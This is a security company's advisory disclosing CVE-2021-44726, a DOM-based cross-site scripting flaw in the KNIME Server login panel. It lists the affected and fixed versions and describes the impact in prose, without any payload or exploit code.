We are reliable, trustworthy, and ready for challenges! Hire Us
KNIME Server – DOM-based XSS in a login panel
- Home
- Advisories
- KNIME Server – DOM-based XSS in a login panel
DATE
10.12.2021
Affected Vendor
KNIME AG
Affected Product
KNIME Server – Enterprise software for putting your data science workflows into production – https://www.knime.com/knime-software
Vulnerable version
4.13.3, 4.12.4, 4.11.5
Fixed version
4.13.4, 4.12.5, 4.12.6
CVSS
Recommendations
Update to KNIME Server version 4.13.4, 4.12.5, or 4.12.6
Vulnerability details
The KNIME Server web application up to version 4.13.3 login panel contains a DOM-based XSS vulnerability that once exploited, can be used to run any action as a victim user via malicious JavaScript.
If the victim user is an administrator, it could be used to create a new administrator.
To exploit the vulnerability it is required to create a specially crafted URL and convince the victim to open it.
No authentication is required to exploit the vulnerability, however, authenticated users can be targeted.
CVE
CVE-2021-44726
Credits
Dawid Czarnecki
Do you think the security of your data might be lacking? Let's find the best approach together.
Once you contact us, we will ask you about the project you want to secure.